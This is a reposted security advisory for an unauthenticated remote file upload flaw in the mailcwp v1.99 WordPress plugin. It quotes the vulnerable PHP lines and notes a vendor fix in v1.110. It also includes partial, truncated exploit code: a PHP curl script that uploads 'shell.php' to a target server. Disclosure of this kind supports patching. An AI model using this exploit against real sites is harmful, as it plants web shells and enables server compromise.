Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: http://ift.tt/1fNXjxW Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Vendor Contact: Contact Page via WP site Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"]; . . 8 $fileName = $_FILES["file"]["name"]; 9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); Exploitation requires the attacker to guess a writeable location in the http server root. CVEID: OSVDB: Exploit Code: • 'shell.php','file'=>'@'.$file_name_with_full_path);
•
• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo "
";
• echo $result;
• echo "
";
• ?> • Advisory: http://ift.tt/1I9jICg
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment